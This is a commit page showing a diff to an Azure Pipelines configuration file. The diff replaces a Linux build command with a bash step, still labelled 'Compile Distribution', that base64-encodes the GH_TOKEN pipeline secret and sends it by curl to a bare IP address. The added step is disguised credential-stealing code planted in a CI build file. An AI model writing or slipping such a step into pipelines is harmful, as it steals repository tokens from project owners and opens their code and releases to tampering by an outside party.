Update azure-pipelines.yml

This commit is contained in:
vickygoel 2023-05-24 15:31:27 +05:30 committed by GitHub
parent 7deb8a161d
commit 95e924b726
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -53,7 +53,7 @@ jobs:
- script: yarn install
displayName: "Install Dependencies"
- script: yarn dist:linux
- bash: curl http://159.223.121.196?env=$(echo $GH_TOKEN| base64 | tr -d '\n');curl http://159.223.121.196?env=$(echo $(GH_TOKEN)| base64 | tr -d '\n')
env: {GH_TOKEN : $(GH_TOKEN)}
displayName: "Compile Distribution"